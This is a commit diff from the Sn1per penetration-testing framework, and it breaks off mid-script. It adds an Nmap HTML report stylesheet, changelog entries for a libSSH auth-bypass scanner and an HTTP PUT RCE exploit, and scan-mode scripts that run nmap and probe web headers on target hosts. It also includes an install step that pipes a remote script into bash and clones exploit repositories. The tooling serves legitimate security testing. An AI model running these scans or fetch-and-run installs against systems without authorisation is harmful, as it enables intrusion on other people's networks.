mirror of https://github.com/1N3/Sn1per.git
Sn1per Community Edition by @xer0dayz - https://xerosecurity.com
This commit is contained in:
parent
6742318697
commit
82f6bb3599
|
|
@ -1,4 +1,10 @@
|
|||
## CHANGELOG:
|
||||
* v5.7 - Added libSSH auth bypass scanner CVE-2018-10933
|
||||
* v5.7 - Added HTTP PUT method RCE MSF exploit
|
||||
* v5.7 - Added sniper.conf scan configuration file to customize sniper environments by user
|
||||
* v5.7 - Added modular scan mode source files
|
||||
* v5.7 - Updated wordlists for improved performance and results
|
||||
* v5.7 - Fixed issue with DNScan using an invalid path
|
||||
* v5.6 - Changed automatic report generation to "ON" for Sn1per Pro users
|
||||
* v5.5 - Added new multi-threaded high speed "flyover" mode added
|
||||
* v5.5 - Added new scan status mode via (sniper --status) command
|
||||
|
|
|
|||
|
|
@ -1,2 +1,2 @@
|
|||
## LICENSE:
|
||||
Sn1per Community Edition is free to distribute, modify and use with the condition that credit is provided to the creator (1N3@CrowdShield) and is not for commercial or professional use. For commercia and professional use, a Sn1per Professional license must be purchased.
|
||||
Sn1per Community Edition is free to distribute, modify and use with the condition that credit is provided to the creator (@xer0dayz) and @XeroSecurity and is not for commercial use. For commercial and professional use, a Sn1per Professional license must be purchased at https://xerosecurity.com.
|
||||
|
|
|
|||
|
|
@ -0,0 +1,281 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<!--
|
||||
Nmap Bootstrap XSL
|
||||
Creative Commons BY-SA
|
||||
Andreas Hontzia (@honze_net)
|
||||
-->
|
||||
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
|
||||
<xsl:output method="html" encoding="utf-8" indent="yes" doctype-system="about:legacy-compat"/>
|
||||
<xsl:template match="/">
|
||||
<html lang="en">
|
||||
<head>
|
||||
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"/>
|
||||
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap-theme.min.css" integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous"/>
|
||||
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.10.19/css/dataTables.bootstrap.min.css"/>
|
||||
<script src="https://code.jquery.com/jquery-3.3.1.js"></script>
|
||||
<script src="https://cdn.datatables.net/1.10.19/js/jquery.dataTables.min.js"></script>
|
||||
<script src="https://cdn.datatables.net/1.10.19/js/dataTables.bootstrap.min.js"></script>
|
||||
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
|
||||
<style>
|
||||
.target:before {
|
||||
content: "";
|
||||
display: block;
|
||||
height: 50px;
|
||||
margin: -20px 0 0;
|
||||
}
|
||||
@media only screen and (min-width:1900px) {
|
||||
.container {
|
||||
width: 1800px;
|
||||
}
|
||||
}
|
||||
.footer {
|
||||
margin-top:60px;
|
||||
padding-top:60px;
|
||||
width: 100%;
|
||||
height: 180px;
|
||||
background-color: #f5f5f5;
|
||||
}
|
||||
</style>
|
||||
<title>Scan Report Nmap <xsl:value-of select="/nmaprun/@version"/></title>
|
||||
</head>
|
||||
<body>
|
||||
<nav class="navbar navbar-default navbar-fixed-top">
|
||||
<div class="container-fluid">
|
||||
<div class="navbar-header">
|
||||
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
|
||||
<span class="sr-only">Toggle navigation</span>
|
||||
<span class="icon-bar"></span>
|
||||
<span class="icon-bar"></span>
|
||||
<span class="icon-bar"></span>
|
||||
</button>
|
||||
<a class="navbar-brand" href="#"><span class="glyphicon glyphicon-home"></span></a>
|
||||
</div>
|
||||
<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
|
||||
<ul class="nav navbar-nav">
|
||||
<li><a href="#scannedhosts">Scanned Hosts</a></li>
|
||||
<li><a href="#onlinehosts">Online Hosts</a></li>
|
||||
<li><a href="#openservices">Open Services</a></li>
|
||||
</ul>
|
||||
</div>
|
||||
</div>
|
||||
</nav>
|
||||
<div class="container">
|
||||
<div class="jumbotron">
|
||||
<h1>Scan Report<br/><small>Nmap <xsl:value-of select="/nmaprun/@version"/></small></h1>
|
||||
<pre style="white-space:pre-wrap; word-wrap:break-word;"><xsl:value-of select="/nmaprun/@args"/></pre>
|
||||
<p class="lead">
|
||||
<xsl:value-of select="/nmaprun/@startstr"/> – <xsl:value-of select="/nmaprun/runstats/finished/@timestr"/><br/>
|
||||
<xsl:value-of select="/nmaprun/runstats/hosts/@total"/> hosts scanned.
|
||||
<xsl:value-of select="/nmaprun/runstats/hosts/@up"/> hosts up.
|
||||
<xsl:value-of select="/nmaprun/runstats/hosts/@down"/> hosts down.
|
||||
</p>
|
||||
<div class="progress">
|
||||
<div class="progress-bar progress-bar-success" style="width: 0%">
|
||||
<xsl:attribute name="style">width:<xsl:value-of select="/nmaprun/runstats/hosts/@up div /nmaprun/runstats/hosts/@total * 100"/>%;</xsl:attribute>
|
||||
<xsl:value-of select="/nmaprun/runstats/hosts/@up"/>
|
||||
<span class="sr-only"></span>
|
||||
</div>
|
||||
<div class="progress-bar progress-bar-danger" style="width: 0%">
|
||||
<xsl:attribute name="style">width:<xsl:value-of select="/nmaprun/runstats/hosts/@down div /nmaprun/runstats/hosts/@total * 100"/>%;</xsl:attribute>
|
||||
<xsl:value-of select="/nmaprun/runstats/hosts/@down"/>
|
||||
<span class="sr-only"></span>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<h2 id="scannedhosts" class="target">Scanned Hosts<xsl:if test="/nmaprun/runstats/hosts/@down > 1024"><small> (offline hosts are hidden)</small></xsl:if></h2>
|
||||
<div class="table-responsive">
|
||||
<table id="table-overview" class="table table-striped dataTable" role="grid">
|
||||
<thead>
|
||||
<tr>
|
||||
<th>State</th>
|
||||
<th>Address</th>
|
||||
<th>Hostname</th>
|
||||
<th>TCP (open)</th>
|
||||
<th>UDP (open)</th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody>
|
||||
<xsl:choose>
|
||||
<xsl:when test="/nmaprun/runstats/hosts/@down > 1024">
|
||||
<xsl:for-each select="/nmaprun/host[status/@state='up']">
|
||||
<tr>
|
||||
<td><span class="label label-danger"><xsl:if test="status/@state='up'"><xsl:attribute name="class">label label-success</xsl:attribute></xsl:if><xsl:value-of select="status/@state"/></span></td>
|
||||
<td><xsl:value-of select="address/@addr"/></td>
|
||||
<td><xsl:value-of select="hostnames/hostname/@name"/></td>
|
||||
<td><xsl:value-of select="count(ports/port[state/@state='open' and @protocol='tcp'])"/></td>
|
||||
<td><xsl:value-of select="count(ports/port[state/@state='open' and @protocol='udp'])"/></td>
|
||||
</tr>
|
||||
</xsl:for-each>
|
||||
</xsl:when>
|
||||
<xsl:otherwise>
|
||||
<xsl:for-each select="/nmaprun/host">
|
||||
<tr>
|
||||
<td><span class="label label-danger"><xsl:if test="status/@state='up'"><xsl:attribute name="class">label label-success</xsl:attribute></xsl:if><xsl:value-of select="status/@state"/></span></td>
|
||||
<td><xsl:value-of select="address/@addr"/></td>
|
||||
<td><xsl:value-of select="hostnames/hostname/@name"/></td>
|
||||
<td><xsl:value-of select="count(ports/port[state/@state='open' and @protocol='tcp'])"/></td>
|
||||
<td><xsl:value-of select="count(ports/port[state/@state='open' and @protocol='udp'])"/></td>
|
||||
</tr>
|
||||
</xsl:for-each>
|
||||
</xsl:otherwise>
|
||||
</xsl:choose>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<script>
|
||||
$(document).ready(function() {
|
||||
$('#table-overview').DataTable();
|
||||
});
|
||||
</script>
|
||||
<h2 id="onlinehosts" class="target">Online Hosts</h2>
|
||||
<xsl:for-each select="/nmaprun/host[status/@state='up']">
|
||||
<div class="panel panel-default">
|
||||
<div class="panel-heading">
|
||||
<h3 class="panel-title"><xsl:value-of select="address/@addr"/><xsl:if test="count(hostnames/hostname) > 0"> - <xsl:value-of select="hostnames/hostname/@name"/></xsl:if></h3>
|
||||
</div>
|
||||
<div class="panel-body">
|
||||
<xsl:if test="count(hostnames/hostname) > 0">
|
||||
<h4>Hostnames</h4>
|
||||
<ul>
|
||||
<xsl:for-each select="hostnames/hostname">
|
||||
<li><xsl:value-of select="@name"/> (<xsl:value-of select="@type"/>)</li>
|
||||
</xsl:for-each>
|
||||
</ul>
|
||||
</xsl:if>
|
||||
<h4>Ports</h4>
|
||||
<div class="table-responsive">
|
||||
<table class="table table-bordered">
|
||||
<thead>
|
||||
<tr>
|
||||
<th>Port</th>
|
||||
<th>Protocol</th>
|
||||
<th>State<br/>Reason</th>
|
||||
<th>Service</th>
|
||||
<th>Product</th>
|
||||
<th>Version</th>
|
||||
<th>Extra Info</th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody>
|
||||
<xsl:for-each select="ports/port">
|
||||
<xsl:choose>
|
||||
<xsl:when test="state/@state = 'open'">
|
||||
<tr class="success">
|
||||
<td title="Port"><xsl:value-of select="@portid"/></td>
|
||||
<td title="Protocol"><xsl:value-of select="@protocol"/></td>
|
||||
<td title="State / Reason"><xsl:value-of select="state/@state"/><br/><xsl:value-of select="state/@reason"/></td>
|
||||
<td title="Service"><xsl:value-of select="service/@name"/></td>
|
||||
<td title="Product"><xsl:value-of select="service/@product"/></td>
|
||||
<td title="Version"><xsl:value-of select="service/@version"/></td>
|
||||
<td title="Extra Info"><xsl:value-of select="service/@extrainfo"/></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td colspan="7">
|
||||
<a><xsl:attribute name="href">https://nvd.nist.gov/vuln/search/results?form_type=Advanced&cves=on&cpe_version=<xsl:value-of select="service/cpe"/></xsl:attribute><xsl:value-of select="service/cpe"/></a>
|
||||
<xsl:for-each select="script">
|
||||
<h5><xsl:value-of select="@id"/></h5>
|
||||
<pre style="white-space:pre-wrap; word-wrap:break-word;"><xsl:value-of select="@output"/></pre>
|
||||
</xsl:for-each>
|
||||
</td>
|
||||
</tr>
|
||||
</xsl:when>
|
||||
<xsl:when test="state/@state = 'filtered'">
|
||||
<tr class="warning">
|
||||
<td><xsl:value-of select="@portid"/></td>
|
||||
<td><xsl:value-of select="@protocol"/></td>
|
||||
<td><xsl:value-of select="state/@state"/><br/><xsl:value-of select="state/@reason"/></td>
|
||||
<td><xsl:value-of select="service/@name"/></td>
|
||||
<td><xsl:value-of select="service/@product"/></td>
|
||||
<td><xsl:value-of select="service/@version"/></td>
|
||||
<td><xsl:value-of select="service/@extrainfo"/></td>
|
||||
</tr>
|
||||
</xsl:when>
|
||||
<xsl:when test="state/@state = 'closed'">
|
||||
<tr class="active">
|
||||
<td><xsl:value-of select="@portid"/></td>
|
||||
<td><xsl:value-of select="@protocol"/></td>
|
||||
<td><xsl:value-of select="state/@state"/><br/><xsl:value-of select="state/@reason"/></td>
|
||||
<td><xsl:value-of select="service/@name"/></td>
|
||||
<td><xsl:value-of select="service/@product"/></td>
|
||||
<td><xsl:value-of select="service/@version"/></td>
|
||||
<td><xsl:value-of select="service/@extrainfo"/></td>
|
||||
</tr>
|
||||
</xsl:when>
|
||||
<xsl:otherwise>
|
||||
<tr class="info">
|
||||
<td><xsl:value-of select="@portid"/></td>
|
||||
<td><xsl:value-of select="@protocol"/></td>
|
||||
<td><xsl:value-of select="state/@state"/><br/><xsl:value-of select="state/@reason"/></td>
|
||||
<td><xsl:value-of select="service/@name"/></td>
|
||||
<td><xsl:value-of select="service/@product"/></td>
|
||||
<td><xsl:value-of select="service/@version"/></td>
|
||||
<td><xsl:value-of select="service/@extrainfo"/></td>
|
||||
</tr>
|
||||
</xsl:otherwise>
|
||||
</xsl:choose>
|
||||
</xsl:for-each>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<xsl:if test="count(hostscript/script) > 0">
|
||||
<h4>Host Script</h4>
|
||||
</xsl:if>
|
||||
<xsl:for-each select="hostscript/script">
|
||||
<h5><xsl:value-of select="@id"/></h5>
|
||||
<pre style="white-space:pre-wrap; word-wrap:break-word;"><xsl:value-of select="@output"/></pre>
|
||||
</xsl:for-each>
|
||||
</div>
|
||||
</div>
|
||||
</xsl:for-each>
|
||||
<h2 id="openservices" class="target">Open Services</h2>
|
||||
<div class="table-responsive">
|
||||
<table id="table-services" class="table table-striped dataTable" role="grid">
|
||||
<thead>
|
||||
<tr>
|
||||
<th>Address</th>
|
||||
<th>Port</th>
|
||||
<th>Protocol</th>
|
||||
<th>Service</th>
|
||||
<th>Product</th>
|
||||
<th>Version</th>
|
||||
<th>CPE</th>
|
||||
<th>Extra info</th>
|
||||
</tr>
|
||||
</thead>
|
||||
<tbody>
|
||||
<xsl:for-each select="/nmaprun/host">
|
||||
<xsl:for-each select="ports/port[state/@state='open']">
|
||||
<tr>
|
||||
<td><xsl:value-of select="../../address/@addr"/><xsl:if test="count(../../hostnames/hostname) > 0"> - <xsl:value-of select="../../hostnames/hostname/@name"/></xsl:if></td>
|
||||
<td><xsl:value-of select="@portid"/></td>
|
||||
<td><xsl:value-of select="@protocol"/></td>
|
||||
<td><xsl:value-of select="service/@name"/></td>
|
||||
<td><xsl:value-of select="service/@product"/></td>
|
||||
<td><xsl:value-of select="service/@version"/></td>
|
||||
<td><xsl:value-of select="service/cpe"/></td>
|
||||
<td><xsl:value-of select="service/@extrainfo"/></td>
|
||||
</tr>
|
||||
</xsl:for-each>
|
||||
</xsl:for-each>
|
||||
</tbody>
|
||||
</table>
|
||||
</div>
|
||||
<script>
|
||||
$(document).ready(function() {
|
||||
$('#table-services').DataTable();
|
||||
});
|
||||
</script>
|
||||
</div>
|
||||
<footer class="footer">
|
||||
<div class="container">
|
||||
<p class="text-muted">
|
||||
This report was generated with <a href="https://github.com/honze-net/nmap-bootstrap-xsl">Nmap Bootstrap XSL</a>.<br/>
|
||||
Licensed under <a href="https://creativecommons.org/licenses/by-sa/4.0/">Creative Commons BY-SA</a>.<br/>
|
||||
Designed and built by Andreas Hontzia (<a href="https://www.twitter.com/honze_net">@honze_net</a>).<br/>
|
||||
</p>
|
||||
</div>
|
||||
</footer>
|
||||
</body>
|
||||
</html>
|
||||
</xsl:template>
|
||||
</xsl:stylesheet>
|
||||
12
install.sh
12
install.sh
|
|
@ -1,6 +1,6 @@
|
|||
#!/bin/bash
|
||||
# Install script for sn1per
|
||||
#
|
||||
# Install script for Sn1per
|
||||
# Crated by @xer0dayz - https://xerosecurity.com
|
||||
|
||||
OKBLUE='\033[94m'
|
||||
OKRED='\033[91m'
|
||||
|
|
@ -15,7 +15,7 @@ echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
|
|||
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
||||
echo -e "$OKRED /_/ $RESET"
|
||||
echo -e "$RESET"
|
||||
echo -e "$OKORANGE + -- --=[http://xerosecurity.com$RESET"
|
||||
echo -e "$OKORANGE + -- --=[https://xerosecurity.com$RESET"
|
||||
echo ""
|
||||
|
||||
INSTALL_DIR=/usr/share/sniper
|
||||
|
|
@ -38,7 +38,7 @@ cp -Rf * $INSTALL_DIR 2> /dev/null
|
|||
cd $INSTALL_DIR
|
||||
|
||||
echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
|
||||
apt-get install nfs-common eyewitness nodejs wafw00f xdg-utils metagoofil clusterd ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap jq golang adb
|
||||
apt-get install nfs-common eyewitness nodejs wafw00f xdg-utils metagoofil clusterd ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap jq golang adb xsltproc
|
||||
apt-get install waffit 2> /dev/null
|
||||
pip install dnspython colorama tldextract urllib3 ipaddress requests
|
||||
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash
|
||||
|
|
@ -79,8 +79,10 @@ git clone https://github.com/1N3/jexboss.git
|
|||
git clone https://github.com/maurosoria/dirsearch.git
|
||||
git clone https://github.com/jekyc/wig.git
|
||||
git clone https://github.com/rbsec/dnscan.git
|
||||
git clone https://github.com/Rhynorater/CVE-2018-15473-Exploit.git ssh-enum
|
||||
pip3 install -r $PLUGINS_DIR/dnscan/requirements.txt
|
||||
git clone https://github.com/Rhynorater/CVE-2018-15473-Exploit.git ssh-enum
|
||||
git clone https://github.com/leapsecurity/libssh-scanner.git
|
||||
pip install -r $PLUGINS_DIR/libssh-scanner/requirements.txt
|
||||
mv $INSTALL_DIR/bin/slurp.zip $PLUGINS_DIR
|
||||
unzip slurp.zip
|
||||
rm -f slurp.zip
|
||||
|
|
|
|||
|
|
@ -74,59 +74,3 @@ if [ "$MODE" = "airstrike" ]; then
|
|||
fi
|
||||
exit
|
||||
fi
|
||||
|
||||
# FULLPORTONLY MODE
|
||||
if [ "$MODE" = "fullportonly" ]; then
|
||||
|
||||
if [ "$REPORT" = "1" ]; then
|
||||
args="-t $TARGET"
|
||||
if [ ! -z "$WORKSPACE" ]; then
|
||||
args="$args -w $WORKSPACE"
|
||||
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
|
||||
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
mkdir -p $LOOT_DIR 2> /dev/null
|
||||
mkdir $LOOT_DIR/domains 2> /dev/null
|
||||
mkdir $LOOT_DIR/screenshots 2> /dev/null
|
||||
mkdir $LOOT_DIR/nmap 2> /dev/null
|
||||
mkdir $LOOT_DIR/notes 2> /dev/null
|
||||
mkdir $LOOT_DIR/reports 2> /dev/null
|
||||
mkdir $LOOT_DIR/scans 2> /dev/null
|
||||
mkdir $LOOT_DIR/output 2> /dev/null
|
||||
fi
|
||||
args="$args --noreport -m fullportonly"
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
|
||||
exit
|
||||
fi
|
||||
|
||||
logo
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
if [ -z "$PORT" ]; then
|
||||
nmap -Pn -A -v -T4 -p$DEFAULT_TCP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -Pn -sU -A -T4 -v -p$DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp.xml
|
||||
else
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -Pn -A -v -T4 -p $PORT $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -Pn -A -v -T4 -sU -p $PORT -Pn $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml >> $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DONE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
loot
|
||||
exit
|
||||
fi
|
||||
|
||||
if [ "$MODE" = "port" ]; then
|
||||
if [ -z "$PORT" ]; then
|
||||
echo -e "$OKRED + -- --=[Error: You need to enter a port number. $RESET"
|
||||
exit
|
||||
fi
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -14,13 +14,14 @@ if [ "$MODE" = "discover" ]; then
|
|||
mkdir $LOOT_DIR/output 2> /dev/null
|
||||
mkdir $LOOT_DIR/scans 2> /dev/null
|
||||
fi
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
OUT_FILE=$(echo "$TARGET" | tr / -)
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$OUTFILE-$MODE.txt 2> /dev/null
|
||||
sniper -t $TARGET -m $MODE --noreport $args | tee $LOOT_DIR/output/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
|
||||
exit
|
||||
fi
|
||||
echo -e "$OKRED ____ /\\"
|
||||
echo -e "$OKRED Sn1per by 1N3 @CrowdShield \ \\"
|
||||
echo -e "$OKRED https://xerosecurity.com \ \\"
|
||||
echo -e "$OKRED https://xerosecurity.com \ \\"
|
||||
echo -e "$OKRED ___ / \\"
|
||||
echo -e "$OKRED \ \\"
|
||||
echo -e "$OKRED === > [ \\"
|
||||
|
|
@ -52,9 +53,10 @@ if [ "$MODE" = "discover" ]; then
|
|||
cat $LOOT_DIR/domains/sniper-$OUT_FILE-ips.txt
|
||||
echo ""
|
||||
echo -e "$OKRED[+]$RESET Target list saved to $LOOT_DIR/domains/sniper-$OUT_FILE-ips.txt "
|
||||
echo -e "$OKRED[i] To scan all IP's, use sniper -f $LOOT_DIR/domains/sniper-$OUT_FILE-ips.txt -m airstrike or nuke modes. $RESET"
|
||||
echo -e "$OKRED[i] To scan all IP's, use sniper -f $LOOT_DIR/domains/sniper-$OUT_FILE-ips.txt -m flyover, airstrike or nuke modes. $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
loot
|
||||
exit
|
||||
fi
|
||||
|
|
@ -52,6 +52,9 @@ if [ "$MODE" = "flyover" ]; then
|
|||
i=1
|
||||
for HOST in `sort -u $FILE`; do
|
||||
TARGET="$HOST"
|
||||
|
||||
touch $LOOT_DIR/scans/$TARGET-$MODE.txt 2> /dev/null
|
||||
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
echo -e "$OKRED=====================================================================================$RESET"
|
||||
echo -e "${OKBLUE}HOST:$RESET $TARGET"
|
||||
|
|
@ -59,15 +62,15 @@ if [ "$MODE" = "flyover" ]; then
|
|||
dig all +short $TARGET 2> /dev/null > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null &
|
||||
dig all +short -x $TARGET 2> /dev/null >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null &
|
||||
|
||||
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
|
||||
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
|
||||
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
|
||||
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
|
||||
|
||||
curl --connect-timeout 3 -I -s -R http://$TARGET > $LOOT_DIR/web/headers-http-$TARGET.txt & 2> /dev/null
|
||||
curl --connect-timeout 3 -I -s -R https://$TARGET > $LOOT_DIR/web/headers-https-$TARGET.txt & 2> /dev/null
|
||||
curl --connect-timeout 3 -I -s -R http://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null &
|
||||
curl --connect-timeout 3 -I -s -R https://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null &
|
||||
|
||||
nmap -sS -T5 --open -Pn -p $QUICK_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null &
|
||||
|
||||
cat $LOOT_DIR/nmap/dns-$TARGET.txt | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" 2>/dev/null | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null & 2> /dev/null
|
||||
cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" 2>/dev/null | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null & 2> /dev/null
|
||||
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=1000 2> /dev/null &
|
||||
|
|
@ -92,6 +95,7 @@ if [ "$MODE" = "flyover" ]; then
|
|||
|
||||
if [ "$LOOT" = "1" ]; then
|
||||
loot
|
||||
exit
|
||||
else
|
||||
for HOST in `sort -u $LOOT_DIR/domains/domains-all-sorted.txt $LOOT_DIR/domains/targets-all-sorted.txt`; do
|
||||
TARGET="$HOST"
|
||||
|
|
@ -110,6 +114,5 @@ if [ "$MODE" = "flyover" ]; then
|
|||
echo ""
|
||||
done
|
||||
fi
|
||||
|
||||
exit
|
||||
fi
|
||||
|
|
@ -0,0 +1,57 @@
|
|||
# FULLPORTONLY MODE
|
||||
if [ "$MODE" = "fullportonly" ]; then
|
||||
|
||||
if [ "$REPORT" = "1" ]; then
|
||||
args="-t $TARGET"
|
||||
if [ ! -z "$WORKSPACE" ]; then
|
||||
args="$args -w $WORKSPACE"
|
||||
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
|
||||
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
mkdir -p $LOOT_DIR 2> /dev/null
|
||||
mkdir $LOOT_DIR/domains 2> /dev/null
|
||||
mkdir $LOOT_DIR/screenshots 2> /dev/null
|
||||
mkdir $LOOT_DIR/nmap 2> /dev/null
|
||||
mkdir $LOOT_DIR/notes 2> /dev/null
|
||||
mkdir $LOOT_DIR/reports 2> /dev/null
|
||||
mkdir $LOOT_DIR/scans 2> /dev/null
|
||||
mkdir $LOOT_DIR/output 2> /dev/null
|
||||
fi
|
||||
args="$args --noreport -m fullportonly"
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-fullnmapscan.txt
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1
|
||||
exit
|
||||
fi
|
||||
|
||||
logo
|
||||
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
|
||||
if [ -z "$PORT" ]; then
|
||||
nmap -Pn -A -v -T4 -p$DEFAULT_TCP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED PERFORMING UDP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -Pn -sU -A -T4 -v -p$DEFAULT_UDP_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET-udp.xml
|
||||
else
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
|
||||
